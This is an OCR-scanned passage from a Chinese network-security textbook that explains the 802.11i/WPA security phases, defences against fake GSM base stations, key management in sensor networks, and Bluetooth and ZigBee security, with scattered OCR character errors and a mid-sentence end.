现 。WRAP 机 制 则 是 基于 AES 加 密 算法 和 OCB (OffsetCodebook)。 

802.11i 定义 的 安全 工作 机 制 分 为 安全 能 力 通 告 协商 、 安 全 接 入 认证 、 会 话 密 钥 协商 
和 加 密 数据 通信 4 个 阶段 : 

© 安全 能 力 通告 发 生 在 STA 与 AP 之 间 建 立 802.11 关联 阶段 : 首先 ，AP 为 通告 
身 对 WPA 的 支持 , 会 对 外 发 送 一 个 包含 AP 的 安全 配置 信息 (包括 加 密 算法 及 认证 方法 
等 安全 配置 信息 ) AW; BEAT, STA 向 AP 发 送 802.11X 系统 认证 请 求 ，AP 响应 认证 结 
果 ， 从 而 实现 STA 和 AP 的 链 路 间 认 证 ; 最 后 ，STA 根据 AP 通告 的 正信 息 选 择 相应 的 
安全 配置 ， 并 将 所 选择 的 安全 配置 信息 发 送 至 AP。 在 该 阶段 中 ， 如 果 STA 不 支持 AP 
所 能 支持 的 任何 一 种 加 密 和 认证 方法 ， 则 AP 可 拒绝 与 之 建立 关联 ， 反 过 来 ， 如 果 AP 
不 支持 STA 支持 任何 一 种 加 密 和 认证 方法 ， 则 STA 也 可 拒绝 与 AP 建立 关联 。 

@ 安全 接 入 认证 阶段 :该 阶段 主要 进行 用 户 身 份 认 证 ， 并 产生 双方 的 成 对 主 密 钥 
PMK. PMK 是 所 有 密 钥 数 据 的 最 终 来 源 ， 可 由 STA 和 认证 服务 器 动态 协商 而 成 ， 或 由 
配置 的 预 共 享 密 钥 (PSK) 直接 提供 。 对 于 802.1X 认证 方式 : PMK 是 在 认证 过 程 中 STA 
和 认证 服务 器 动态 协商 生成 (由 认证 方式 协议 中 规定 )， 这 个 过 程 对 AP 来 说 是 透明 的 ， 
AP 主要 完成 用 户 认 证 信息 的 上 传 、 下 达 工 作 ， 并 根据 认证 结果 打开 或 关闭 端口 。 对 于 
PSK 认证 : PSK 认证 没有 STA 和 认证 服务 器 协商 PMK 的 过 程 ，AP 和 STA 把 设置 的 预 
共享 密 钥 直接 当 作 是 PMK， 只 有 接 入 认证 成 功 ，STA 和 认证 服务 器 (对 于 802.1X 认证 ) 
才 产 生 双方 的 PMK。 对 于 802.1X 接 入 认证 ， 在 认证 成 功 后 ， 服 务 器 会 将 生成 的 PMK 
分 发 给 AP。 
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@ 会 话 密 钥 协商 阶段 : 该 阶段 主要 是 进行 通信 密 钥 协商 ， 生 成 PTK 和 GTK， 分 别 
用 来 加 密 单 播 和 组 播报 文 。AP 与 STA 通过 EAPOL-KEY 报 文 进行 WPA 的 4 次 握手 
(4-WayHandshake) 进行 密 钥 协商 。 在 4 次 握手 的 过 程 中 ，AP 与 STA 在 PMK 的 基础 上 
计算 出 一 个 512 位 的 PTK， 并 将 该 PTK 分 解 成 为 以 下 几 种 不 同 用 途 的 密 钥 : 数据 加 密 
ZH, MICKey (数据 完整 性 密 钥 )、EAPOL-Key 报 文 加 密 窗 钥 、EAPOL-Key 报 文 完 整 
性 加 密 密 钥 等 。 用 来 为 随后 的 单 播 数据 帧 和 EAPOLKey 消息 提供 加 密 和 消息 完整 性 保 
Po 在 4 次 握手 成 功 后 , AP 使 用 PTK 的 部 分 字段 对 GTK 进行 加 密 , 并 将 加 密 后 的 GTK 
发 送 给 STA, STA 使 用 PTK 解密 出 GTK. GTK 是 一 组 全 局 加 密 密 钥 ，AP 用 GTK 来 加 
密 广播 、 组 播 通信 报 文 ， 所 有 与 该 AP 建立 关联 的 STA 均 使 用 相同 的 GTK 来 解密 AP 
发 出 的 广播 ， 组 播 加密 报 文 并 检验 其 MIC。 
@ 加 密 数据 通信 阶段 : 该 阶段 主要 进行 数据 的 加 密 及 通信 。TKIP 或 AES 加 密 算法 
并 不 直接 使 用 由 PTK/GTK 分 解 出 来 的 密 钥 作为 加 密 报 文 的 密 钥 ， 而 是 将 该 密 钥 作为 基 
础 密 钥 (BaseKey)， 经 过 两 个 阶段 的 密 钥 混合 过 程 ， 从 而 生成 一 个 新 密 钥 。 每 一 次 报 文 
传输 都 会 生成 不 一 样 的 密 钥 。 在 随后 的 通信 过 程 中 , AP 和 STA 都 使 用 该 密 钥 加 密 通 信 。 
3.53.6 ”移动 通信 系统 安全 
2G 伪 基 站 攻击 防御 : 改善 GSM (GlobalSystemforMobileCommunication) 网 络 安全 
可 以 从 以 下 几 个 方面 进行 : 
。 调整 基站 参数 ， 在 不 改变 GSM 网 络 鉴 权 协 议 的 情况 下 ， 各 大 移动 运营 商 可 以 通 
过 调整 各 基站 小 区 的 参数 来 歇 制 伪 基 站 的 危害 。 移动 台 接 入 到 伪 基 站 时 并 不 知道 
自己 接 入 的 是 非法 的 网 络 ， 而 仅仅 是 以 为 发 生 了 一 次 正常 的 小 区 切换 。 因 此 ， 可 
以 通过 适当 的 调整 基站 的 参数 来 遏制 移动 台 连 接 伪 基站 。 小 区 切换 的 主要 是 受 路 
径 消 耗 、CRO (小 区 重 选 偏 移 值 )、PT 惩罚 时 间 〉 和 CRH (小 区 重 选 滞后 值 ) 
的 影响 。 对 于 中 国 移动 GSM 系统 而 言 ， 当 PT 不 等 于 31 时 ， 提 高 参数 CRO 的 
数值 ， 可 以 使 C2 变 大 ， 从 而 提高 基站 的 信号 强度 ， 在 一 定 程 度 上 可 以 过 制 伪 基 
站 。 而 当 PT 等 于 31 时 ，CRO 将 是 一 个 负 的 修正 ， 提 高 CRO 的 数值 将 会 导致 所 
在 小 区 过 多 的 处 于 空闲 状态 ， 影 响 整 个 网 络 的 性 能 与 利用 率 。 目 前 ， 中 国 移动 就 
要 求 所 有 小 区 的 CRO 设置 为 55， 目 的 就 是 要 减少 伪 基 站 的 危害 。 同 时 可 以 减少 
CRH 的 数值 (CRH 取 值 是 0~7， 对 应 的 信号 强度 是 0~-14dBm) 来 使 得 移动 台 更 
容易 连接 到 正式 的 网 络 当中 。CRH 原本 是 为 了 防止 移动 台 在 两 个 基站 小 区 的 临界 
区 域 中 频繁 的 更 换 小 区 而 设置 的 。 减 小 CRH 的 数值 ， 可 以 使 得 移动 台 更 容易 接 
入 到 真正 的 GSM 网 络 ， 从 而 减 小 移动 台 接 入 伪 基 站 的 可 能 性 ， 但 是 这 同样 会 导 
致 在 小 区 间 临 界 区 域内 的 移动 台 频 繁 更 换 小 区 ， 如 何 保证 性 能 和 安全 的 平衡 ， 将 
是 各 运营 商 需要 权衡 的 问题 。 
。 定位 伪 基站 ， 目 前 伪 基 站 经 常 被 不 法 分 子 用 来 向 移动 用 户 群 发 垃圾 短 消 息 ， 这 给 
用 户 带 来 很 大 的 困扰 。 为 了 解决 这 个 问题 ， 定 位 伪 基 站 的 位 置 需要 移动 用 户 与 运 
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营 商 共 同 努 力 。 对 于 移动 用 户 来 说 , 当 一 个 区 域内 的 用 户 突然 接收 到 垃圾 短 消 息 ， 
移动 台 突 然 没 有 信和 号， 无 法 进行 语音 通信 ， 或 者 信号 时 好 时 坏 等 状况 时 ， 很 有 可 
能 是 附近 区 域 被 伪 基 站 的 信号 所 覆盖 。 当 用 户 发 现 以 上 几 种 状况 时 ， 应 及 时 向 运 
营 商 反 馈 ， 使 得 运营 商 获 得 快速 获得 伪 基 站 信息 ， 便 于 锁定 伪 基 站 的 位 置 。 对 于 
运营 商 来 说 ， 应 增强 对 移动 台 连 接 状 况 的 监测 ， 从 而 定位 伪 基 站 。 伪 基站 群发 短 
消息 时 ， 必 然 导 致 附近 区 域内 的 大 部 分 移动 台 离开 原来 的 基站 小 区 ， 连 接 到 伪 基 
站 中 ,之 后 又 重新 连接 到 原来 的 网 络 中 。 运 营 商 通过 监测 这 种 区 域内 大 范围 的 移 
动用 户 进行 小 区 切换 的 状况 ， 可 以 大 致 判定 某 一 区 域内 是 否 有 伪 基 站 运行 。 换 句 
话说 ， 运 营 商 可 以 通过 监测 某 个 区 域内 的 移动 台 连 接 情况 来 定位 伪 基 站 的 位 置 。 
运营 商 可 以 和 公安 机 关 等 执法 部 门 配合 ， 加 强 对 伪 基 站 的 查找 和 处 罚 力度 ， 从 行 
政和 执法 上 加 强 对 网 络 的 保护 。 另 外 ， 伪 基站 群发 的 短 消息 通常 都 是 一 些 广告 消 
息 ， 加 强 非法 广告 的 查处 与 管理 ， 同 样 可 以 从 源头 上 保证 网 络 的 安全 。 最 后 ， 目 
前 国内 的 伪 基 站 常用 的 核心 无 线 电 收发 设备 是 USRP， 而 国内 生产 USRP 的 厂商 
并 不 多 ， 加 强 对 硬件 设备 渠道 的 管理 同样 是 保护 GSM 网 络 行 之 有 效 的 方法 。 
3.5.3.7 “无线 传感器 网 络 安全 

1. 密 钥 管理 、 身 份 认证 和 数据 加 窗 

公开 密 钥 加 密 由 于 加 密 安 全 性 高 、 网 络 抗 毁 性 强 等 优点 ， 被 广泛 应 用 于 传统 网 络 。 
但 是 传感器 网 络 资源 (包括 节点 自身 能 量 、 存 储 容量 、 计 算 和 通信 能 力 等 ) 严格 受 限 的 
特点 使 得 公开 密 钥 管理 机 制 难以 直接 应 用 。 无 线 传感器 网 络 中 现 有 的 基于 公开 密 钥 的 机 
制 包括 基于 椭圆 曲线 的 加 密 机 制 和 基于 PKI 技术 的 加 密 协 议 TinyPK。 但 是 由 于 采用 公开 
密 钥 的 管理 机 制 在 节点 进行 认证 或 获取 密 钥 时 ， 网 络 通信 开销 和 节点 计算 开销 大 ， 容 易 
招致 拒绝 服务 攻击 ， 目 前 尚未 形成 主流 。 

对 称 密 钥 加 密 算法 由 于 加 密 处 理 简单 ， 加 解密 速度 快 ， 密 钥 较 短 等 特点 ， 非 常 适合 
资源 受 限 的 传感器 网 络 部 署 使 用 。 在 传感器 网 络 中 ， 对 称 密 钥 管理 机 制 除了 要 考虑 密 钥 
安全 可 靠 分 发 传递 途径 以 外 ， 还 要 考虑 节点 被 捕获 导致 的 密 钥 泄 露 对 网 络 中 其 他 正常 节 
点 通信 的 安全 威胁 问题 。 另 外 ， 由 于 传感器 网 络 资源 受 限 ， 对 称 密 钥 管理 机 制 在 满足 网 
络 性 能 (如 节点 内 存 、 计 算 及 通信 开销 ， 网 络 密 钥 连通 性 ， 网 络 可 扩展 性 、 安 全 性 等 ) 
存在 矛盾 ， 需 要 进行 综合 考虑 。 尽 管 存在 这 些 问 题 ， 对 称 密 钥 管 理 机 制 依 旧 是 目前 传 感 
器 网 络 密 钥 管理 的 主要 方法 。 目 前 无 线 传感器 网 络 有 很 多 对 称 密 钥 管理 协议 。 它 们 的 主 
要 思想 是 在 网 络 部 署 之 前 预先 分 配给 每 个 节点 一 定数 目的 对 称 密 钥 或 者 密 钥 源 ， 两 个 节 
点 通过 交换 密 钥 ID 信息 来 发 现 并 使 用 共同 拥有 的 密 钥 进行 加 密 通 信 。 对 称 密 钥 管理 协 
议 主 要 分 成 两 类 : 随机 预 分 配 密 钥 管理 协议 和 确定 性 预 分 配 密 钥 管 理 协议 。 

随机 密 钥 预 分 配 模型 的 基本 思想 是 建立 一 个 密 钥 总 数 为 n 的 大 密 钥 池 及 密 钥 标识 ， 
在 网 络 部 署 前 每 个 传感器 节点 从 密 钥 池 中 随机 抽取 部 分 密 钥 。 这 种 随机 预 分 配方 式 使 得 
任意 两 个 节点 能 够 以 一 定 的 概率 存在 共享 密 钥 。 在 网 络 进行 正常 工作 以 后 ， 相 邻 节 点 通 
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过 使 用 共享 密 钥 进行 安全 通信 。 例 如 在 密 钥 预 分 配 时 ， 从 含有 mn 个 密 钥 的 密 钥 池 中 随机 
取出 m 个 密 钥 分 配给 各 个 传感器 节点 (m). q-composite 随机 密 钥 预 分 配 模型 是 对 随 
机 密 钥 预 分 配 模型 的 一 种 改进 。 它 要 求 相 邻 节点 的 密 钥 子 集中 只 有 存在 q 个 以 上 的 相同 
密 钥 时 ， 才 能 进行 安全 通信 。 随 着 共享 密 钥 阔 值 q 的 增 大 ， 攻 击 者 通过 构造 优化 密 钥 集 
合 进行 攻击 的 难度 呈 指 数 增 大 ， 但 同时 对 节点 存储 开销 要 求 也 相应 增 大 。 而 且 ， 在 满足 
网 络 使 用 要 求 的 节点 密 钥 连通 概率 p 和 传感器 存储 空间 等 资源 限制 下 ，q 值 的 增加 会 使 
得 密 钥 池 密 钥 总 数 n 减少 。 相应 地 , 单一 节点 的 密 钥 环 对 密 钥 池 而 言 是 一 个 很 大 的 样本 ， 
恶意 攻击 者 只 需要 捕获 少量 的 节点 就 能 够 获得 足够 多 的 密 钥 从 而 对 网 络 造成 危害 。 
q-composite 随机 密 钥 预 分 配 模型 对 小 规模 的 攻击 有 很 好 的 抵抗 性 , 但 大 规模 的 攻击 将 大 
大 降低 其 安全 性 能 。 

基于 多 个 二 元 多 项 式 的 随机 密 钥 预 分 配 机 制 首先 在 给 定 有 限 域 上 随机 生成 n 个 高 阶 
对 称 二 元 多 项 式 ， 然 后 在 网 络 部 署 前 给 每 个 节点 分 配 m 个 多 项 式 。 部 署 后 ， 相 邻 节点 如 
果 存 在 相同 的 多 项 式 ， 则 可 以 建立 密 钥 进行 安全 通信 。 基 于 位 置信 息 的 二 元 多 项 式 密 钥 
预 分 配 机 制 把 部 署 区 域 划分 成 多 个 大 小 一 致 的 方形 区 域 ， 每 个 区 域 分 配 唯 一 的 二 元 多 项 
式 。 在 网 络 部 署 前 ， 对 于 每 个 节点 而 言 ， 部 署 服务 器 根据 其 地 理 位 置信 息 确定 其 所 处 的 
区 域 ， 并 把 与 该 区 域 相 邻 的 上 、 下 、 左 、 右 4 个 区 域 以 及 节点 所 在 区 域 的 5 个 二 元 多 项 
式 分 配给 该 节点 。 如 果 两 个 节点 要 建立 通信 和 密 钥 ， 它 们 首先 找到 共有 的 二 元 多 项 式 ， 然 
后 利用 此 多 项 式 代入 两 节点 ID 即 可 计算 得 到 共享 密 钥 。 该 机 制 提 高 了 邻居 节点 直接 建 
立 通信 密 钥 的 概率 。 另 外 ， 由 于 节点 密 钥 与 其 自身 地 理 位 置 相关 ， 抗 毁 性 明显 提高 。 

由 于 节点 设计 的 低 成 本 考虑 ， 目 前 绝 大 多 数 的 密 钥 管理 协议 在 设计 时 都 是 假设 节点 
容易 被 捕获 并 且 一 旦 被 捕获 节点 内 部 的 所 有 信息 都 将 被 恶意 攻击 者 获得 。 由 于 这 个 假设 ， 
大 部 分 现 有 密 钥 管理 协议 都 存在 门限 效应 : 网 络 的 密 钥 管 理 机 制 只 有 在 被 捕获 的 节点 数 
目 不 超过 某 一 特定 门限 值 (一 般 为 200 一 500 个 节点 ) 时 才能 够 被 认为 是 安全 的 ， 密 钥 系 
统 的 安全 性 取决 于 捕获 超过 门限 值 数目 节点 的 难度 。 然 而 ， 这 些 密 钥 管理 协议 即使 在 被 
捕获 的 节点 数目 少 于 特定 门限 值 的 时 候 仍然 不 能 有 效 抵 御 一 些 典 型 的 主动 攻击 《比如 
Sybil 攻击 ， 复 制 攻击 ， 拒 绝 服务 攻击 等 。 而 且 ， 恶 意 攻击 者 在 捕获 一 个 节点 之 后 ， 在 被 
捕获 节点 周围 通过 信道 监听 并 且 分 析 接收 信号 强度 (RSSI)， 很 容易 对 附近 区 域内 进行 
数据 包 发 送 的 节点 进行 定位 、 捕 获 ， 从 而 可 以 以 较 小 的 代价 捕获 到 超过 门限 值 数 目的 周 
边区 域 的 节点 。 一 旦 恶意 攻击 者 捕获 超过 门限 数目 的 节点 (只 占 整个 网 络 数 以 万 计 节 点 
的 很 小 一 部 分 )， 它 就 能 够 利用 获得 的 密 钥 伪 造 任 意 数 目的 节点 ， 发 动 任何 类 型 的 攻击 ， 
从 而 破坏 整个 网 络 的 安全 性 。 因 此 ， 不 能 单纯 依靠 捕获 一 定数 目 节 点 的 难度 来 保证 安全 
通信 。 现 在 随 着 SoC 技术 在 节点 设计 上 的 应 用 ， 各 种 在 传统 节点 设计 时 代价 较 高 的 安全 
节点 设计 技术 能 够 以 满足 节点 低 成 本 要 求 的 前 提 下 集成 到 节点 芯片 上 去 。 而 且 ， 由 于 传 
感 器 网 络 生存 时 间 有 限 ， 安 全 机 制 只 要 保证 网 络 在 生命 周期 内 安全 就 能 满足 实际 应 用 需 
求 ， 这 就 大 大 降低 了 节点 的 安全 设计 等 级 相应 也 就 降低 了 安全 节点 的 成 本 。 为 了 保证 整 
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个 网 络 的 安全 性 ， 一 种 可 行 的 方法 是 针对 网 络 各 个 层次 的 攻击 进行 各 层次 的 联合 设计 以 
物理 层 的 安全 节点 设计 为 基础 ， 以 密 钥 管理 机 制 、 安 全 路 由 为 中 心 的 安全 机 制 。 该 方法 
E 够 通过 结合 节点 本 身 的 安全 性 和 协议 的 安全 性 ， 并 且 通 过 安全 协议 根据 不 同 层次 的 安 
全 需求 提供 相应 的 安全 密 钥 来 实现 保证 安全 要 求 下 的 能 量 高 效 性 和 网 络 可 扩展 性 。 

2. 攻击 检测 与 抵御 

无 线 传感器 网 络 容易 受到 各 种 恶意 攻击 ， 例 如 干扰 服务 、 节 点 捕获 等 。 可 以 采用 被 
干扰 区 内 节点 切换 通信 频率 的 方式 抵御 干扰 ， 并 解决 了 干扰 区 节点 和 干扰 区 外 节点 通信 
频率 协调 问题 。 针 对 传感器 被 敌 方 获取 、 解 密 甚至 自 改 程序 后 将 对 无 线 传感器 网 络 的 运 
行 和 数据 的 正确 性 带 来 很 大 的 威胁 ， 无 线 传感器 节点 可 以 通过 向 独立 多 路 径 发 送 验 证 数 
据 来 发 现 异常 节点 。 在 时 间 同 步 过 程 中 , 系统 可 以 利用 安全 并 具有 弹性 的 时 间 同 步 协议 ， 
对 抗 外 部 攻击 和 被 俘获 节点 的 影响 。 另 外 ， 每 个 节点 在 多 属性 上 监视 其 邻居 节点 的 网 络 
行为 ， 通 过 异常 数据 值 检测 技术 和 投票 方式 来 发 现 恶 意 节点 ， 同 时 ， 通 过 无 线 信道 监听 
可 以 追踪 恶意 数据 包 来 源 节 点 ， 采 用 转发 节点 以 一 定 概率 进行 嵌 套 签名 的 策略 实现 对 恶 
意 数据 包 的 准确 追踪 。 

3. 安全 路 由 

针对 传感器 网 络 固有 特性 ， 研 究 者 已 经 提出 了 许多 密 钥 管理 方案 ， 它 们 从 一 定 程 度 
上 加 强 了 网 络 通信 安全 性 ， 但 是 只 有 少量 针对 传感器 网 络 通信 特征 结合 通信 协议 考虑 设 
计 的 高 效 安全 机 制 .传感器 网 络 的 SPINS 安全 框架 对 上 述 机 制 提供 了 相应 的 支持 。SPINS 
协议 利用 汇聚 节点 作为 网 络 的 可 信和 密 钥 分 发 中 心 为 网 络 节点 建立 配对 密 钥 及 实现 对 广播 
数据 包 的 认证 。SPINS 包括 用 于 节点 间 安 全 通信 的 SNEP 机 制 和 广播 数据 包 认证 的 
HTESLA 机 制 两 部 分 。 在 SPINS 协议 中 ， 任 何 节点 的 配对 密 铀 、 数 据 包 认 证 都 必须 通过 
汇聚 节点 来 完成 ， 这 会 造成 大 量 的 通信 开销 ， 容 易 招 致 新 的 拒绝 服务 攻击 ， 而 且 SPINS 
协议 仅 提供 了 单一 的 密 钥 机 制 ， 远 远 不 能 满足 大 规模 传感器 网 络 通信 过 程 中 多 种 级 别 的 
安全 需求 。 针 对 这 个 问题 ，LEAP 协议 提供 4 类 密 铀 ， 能 够 支持 网 络 不 同 的 安全 通信 要 
Ke LEAP 协议 的 优点 是 任何 节点 受 损 都 不 会 影响 其 他 节点 的 安全 ， 缺 点 是 节点 部 署 后 ， 
在 网 络 生命 周期 内 必须 保留 全 网 通用 的 主 密 钥 。 一 旦 主 密 钥 被 恶意 攻击 者 获得 ， 则 整个 
网 络 的 安全 都 受到 威胁 。 理 想 的 安全 机 制 是 通过 对 传感器 网 络 自身 硬件 和 通信 特征 的 分 
析 并 结合 通信 特征 设计 的 高 效 安全 密 钥 管理 机 制 ， 并 以 该 密 钥 管理 机 制 为 支撑 应 用 到 路 
由 协议 设计 中 ， 从 而 形成 高 效 的 安全 机 制 。 
3.5.3.8 ”无 线 个 域 网 安全 

1. 蓝牙 安全 

蓝牙 技术 提供 短 距 离 的 对 等 通信 ， 它 在 应 用 层 和 链 路 层 上 都 采取 了 保密 措施 以 保证 
通信 的 安全 性 ， 所 有 蓝牙 设备 都 采用 相同 的 认证 和 加 密 方式 。 在 链 路 层 ， 使 用 4 个 参数 
来 加 强 通信 的 安全 性 , 即 蓝牙 设备 地 址 BD_ADDR、 认 证 私 钥 、 加 密 私 钥 和 随机 码 RAND. 

蓝牙 设备 地 址 是 一 个 48 位 的 IEEE 地 址 ， 它 唯一 地 识别 蓝牙 设备 ， 对 所 有 蓝牙 设备 
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都 是 公开 的 ;认证 私 钥 在 设备 初始 化 期 间 生成 ， 其 长 度 为 128 比特 ;加 密 私 钥 通常 在 认 
证 期 间 由 认证 私 钥 生 成 ， 其 长 度 根 据 算 法 要 求 选择 8~128 比特 之 间 的 数 〈 8 的 整数 倍 )， 
对 于 目前 的 绝 大 多 数 应 用 , 采用 64 比特 的 加 密 私 钥 就 可 保证 其 安全 性 ; 随机 码 由 蓝牙 设 
备 的 伪 随 机 过 程 产 生 ， 其 长 度 为 128 比特 。 每 个 蓝牙 设备 都 有 一 个 伪 随机 码 发 生 器 ， 它 
产生 的 随机 数 可 作为 认证 私 铀 和 加 密 私 钥 。 在 蓝牙 技术 中 ， 仅 要 求 随机 码 是 不 重复 的 和 
随机 产生 的 。“ 不 重复 ”是 指 在 认证 私 钥 生 存 期 间 , 该 随机 码 重 复 的 可 能 性 极 小 ， 如 日 期 
/ 时 间 戳 ;“ 随 机 产生 ”是 指 在 随机 码 产 生前 不 可 能 预测 码 字 的 实际 值 。 蓝牙 设备 加 密 私 
钥 的 长 度 是 由 厂商 预先 设 定 的 ， 用 户 不 能 更 改 。 为 防止 用 户 使 用 不 允许 的 密 钥 长 度 ， 蓝 
牙 基带 处 理 器 不 接受 高 层 软件 提供 的 加 密 私 钥 。 若 想 改 变 连接 密 钥 ， 必 须 按 基带 规范 的 
步骤 进行 ， 其 具体 步骤 取决 于 连接 密 钥 类 型 。 连 接 密 钥 是 一 个 128 比特 的 随机 数 ， 它 由 
两 个 或 多 个 成 员 共 享 ， 是 成 员 间 进行 安全 事务 的 基础 ， 它 本 身 用 于 认证 过 程 ， 同 时 也 作 
为 生成 加 密 私 钥 的 参数 。 

连接 密 钥 可 以 是 半 永 久 的 或 临时 的 。 半 永久 连接 密 钥 保存 在 非 易 失 性 存储 器 中 ， 即 
使 当前 通话 结束 后 也 可 使 用 ， 因 此 ， 它 可 作为 数 个 并 发 连接 的 蓝牙 设备 间 的 认证 码 。 临 
时 连接 密 钥 仅 用 于 当前 通话 。 在 点 对 多 点 的 通信 中 ， 当 主 设备 发 送 广播 信息 时 ， 将 采用 
一 个 公共 密 钥 临时 替换 各 从 设备 当前 的 连接 密 钥 。 

为 适应 各 种 应 用 ， 定 义 如 下 密 钥 类 型 : 组合 密 钥 KAB: 设备 密 钥 KA; 临时 密 钥 
Kmaster; 初始 密 钥 Kinit。 此 外 ，KC 表示 加 密 私 钥 。 任 何 时 候 执行 连接 管理 器 (CLM) 
命令 进行 加 密 时 ， 加 密 私 钥 就 会 自动 改变 。 对 蓝牙 设备 而 言 , KAB 和 KA 在 功能 上 没有 
区 别 ， 只 是 生成 方法 不 同 而 已 。KA 由 设备 自身 生成 ， 且 保持 不 变 ; KAB 由 设备 A 和 设 
备 B 提供 的 信息 共同 生成 ， 只 要 有 两 个 设备 产生 一 个 新 的 连接 ， 就 会 生成 一 个 KAB. 
究竟 采用 KA 或 KAB, 取决 于 具体 应 用 。 对 于 存储 容量 较 小 的 蓝牙 设备 或 者 对 于 处 于 大 
用 户 群 中 的 设备 ， 适 合 采 用 KA， 此 时 只 需 存 储 单个 密 钥 。 对 于 要 求 较 高 安全 级 别 的 应 
FA, 适宜 采用 KAB， 但 要 求 设备 拥有 较 大 的 存储 空间 。Kmaster 仅 用 于 当前 通话 ， 它 可 
以 临时 替换 连接 密 钥 。Kinit 在 初始 化 期 间 用 作 连 接 密 钥 , 以 保证 初始 化 参数 的 安全 传送 ， 
它 由 一 个 随机 数 、PIN 码 的 低 8 位 及 BD_ADDR 生成 。PIN 码 可 以 是 蓝牙 设备 提供 的 一 
个 固定 码 ， 也 可 以 由 用 户 任意 指定 ， 但 两 个 设备 中 的 PIN 码 必须 匹配 。 在 两 个 设备 中 采 
用 用 户 指定 的 PIN 码 比 采用 设备 自身 提供 的 PIN 码 更 安全 ;即使 采用 固定 的 PIN 码 方式 ， 
也 应 该 允许 能 够 改变 PIN 码 ， 以 防止 获得 该 PIN 码 的 用 户 重新 初始 化 设备 。 如 果 找 不 到 
可 用 的 PIN 码 ， 则 使 用 缺 省 值 0。 短 PIN 码 可 以 满足 许多 具体 应 用 的 安全 性 要 求 ， 但 存 
在 不 确定 的 非 安全 因素 ， 过 长 的 PIN 码 不 利于 交换 ， 需 要 应 用 层 软件 的 支持 。 因 而 ， 在 
实际 应 用 中 ， 常 采用 短 的 数据 串 作 为 PIN 码 ， 其 长 度 一 般 不 超过 16 字 节 。 

在 蓝牙 技术 中 , 认证 采用 口令 一 应 答 方式 。 验 证 方 要 求 申 请 者 鉴别 随机 数 AU_RAND 
及 认证 码 El 并 返回 计算 结果 SRES, 若 双方 的 计算 结果 相等 则 认证 成 功 。 在 蓝牙 技术 中 ， 


第 3 章 网 络 安全 基础 


不 要 求 验证 方 一 定 是 主 设备 ， 而 是 由 应 用 本 身 指 明 需 要 认证 的 设备 ， 且 在 某 些 应 用 中 只 
须 单 向 认证 。 在 对 等 通信 中 ， 采 用 相互 认证 方式 ， 由 LM 控制 认证 的 方向 ， 相 互 认证 。 
当 设备 A 成 功 认 证 设备 B 后 ,设备 B 将 AU RANDB (不 同 于 AU RANDA) 发 送 给 设 
A, 设备 B、A 使 用 新 的 AU_RANDB、AU RANDA 和 连接 密 钥 分 别 计算 出 SRES 和 
SRES'， 若 两 者 相等 ， 则 认证 成 功 ， 并 保留 ACO 值 。 若 某 次 认证 失败 ， 则 必须 等 待 一 
定 的 时 间 间 隔 才 能 进行 再 次 认证 。 如 果 使 用 同一 BD_ADDR 重复 认证 ， 则 等 待 的 时 间 间 
隔 将 按 指数 方式 增长 到 最 大 值 ， 若 在 一 段 时 间 内 ， 所 有 认证 都 是 成 功 的 ， 则 两 次 认证 间 
的 时 间 间 隔 将 按 指数 方式 减 小 到 最 小 值 ， 此 方式 可 以 阻止 试图 使 用 不 同 的 密 钥 以 重复 认 
证 方式 登录 的 入 侵 者 。 蓝 牙 设备 保留 了 每 一 个 已 接 入 设备 的 认证 时 间 间 隔 表 ， 以 减少 遭 
到 攻击 的 可 能 性 。 

总 之 ， 蓝 牙 安全 机 制 的 目的 在 于 提供 适当 级 别 的 安全 保护 。 如 果 用 户 有 更 高 级 别 的 
保密 要 求 ， 可 采用 更 有 效 的 传输 层 和 应 用 层 安全 机 制 。 

2. Zigbee 安全 

ZigBee 是 基于 IEEE802.15.4 标准 的 低 功 耗 局 域 网 协议 。 根 据 国际 标准 规定 ，ZigBee 
技术 是 一 种 短 距离 、 低 功 耗 的 无 线 通信 技术 。 其 特点 是 近 距 离 、 低 复杂 度 、 自 组 织 、 低 
功 耗 、 低 数据 速率 。 主 要 适合 用 于 自动 控制 和 远程 控制 领域 ， 可 以 嵌入 各 种 设备 。 简 而 
HZ, ZigBee 就 是 一 种 便宜 的 ， 低 功 耗 的 近 距 离 无 线 组 网 通讯 技术 。ZigBee 是 一 种 低速 
短 距 离 传输 的 无 线 网 络 协议 。ZigBee 协议 从 下 到 上 分 别 为 物理 层 (PHY)、 媒 体 访问 控 
制 层 (MAC)、 传 输 层 CTL)、 网 络 层 (NWK)、 应 用 层 (APL) 等 。 其 中 物理 层 和 媒体 
访问 控制 层 遵循 IEEE802.15.4 标准 的 规定 。ZigBee 设备 的 安全 是 基于 链接 密 钥 (linkkey) 
和 网 络 密 钥 (networkkey)。APL 对 等 实体 之 间 的 单 播 通信 依赖 网 络 中 两 个 设备 共享 的 
128 位 链接 密 钥 进行 安全 保护 ， 而 广播 通信 依赖 网 络 中 所 有 设备 共享 的 128 位 网 络 密 钥 
进行 安全 保护 。 接 收 者 总 是 知道 确切 的 安全 设置 ， 即 ， 接 收 者 知道 一 个 帧 是 否 由 链接 密 
钥 或 网 络 密 钥 保护 。Zigbee 设备 可 通过 密 钥 传 输 、 密 钥 创 建 或 预 安装 (例如 ， 工 厂 安装 ) 
获取 链接 密 钥 。Zigbee 设备 可 通过 密 钥 传输 或 预 安装 获得 网 络 密 钥 。 通 过 密 钥 创 建 获取 
链接 密 钥 的 技术 是 以 主 密 钥 (masterkey) 为 基础 。 设 备 为 了 能 创建 对 应 的 链接 密 钥 必须 
通过 密 钥 传输 或 预 安装 获得 主 密 钥 。 最 终 ， 设 备 之 间 的 安全 取决 于 安全 的 初始 化 和 这 些 
密 钥 的 设置 。 不 同 的 服务 使 用 不 同 的 密 钥 (通过 连接 密 钥 单 项 函数 派生 ), 确保 不 同 的 安 
全 协议 执行 的 逻辑 分 离 。 密 钥 加 载 密 钥 用 于 保护 传输 的 主 密 钥 和 链接 密 钥 。 密 钥 传输 密 
钥 用 于 保护 传输 的 网 络 密 钥 。 活 动 的 网 络 密 钥 可 供 ZigBee 的 NWK 和 APL 层 使 用 ， 因 
此 ， 相 同 的 网 络 密 钥 和 相关 的 流入 流出 帧 计数 器 可 用 于 这 些 层 。 链 接 密 钥 和 主 密 钥 仅 能 
用 于 APS 子 层 。 为 此 ， 链 接 密 钥 及 主 密 钥 仅 能 由 APL 层 使 用 。 

Zigbee 网 络 中 设置 一 个 信任 中 心 ,是 在 网 络 中 分 配 安全 钥匙 的 一 种 令 人 信任 的 设备 。 
它 允 许 设备 加 入 网 络 ， 并 分 配 密 钥 ， 因 而 确保 设备 之 间 端 到 端的 安全 性 。 在 采用 安全 机 
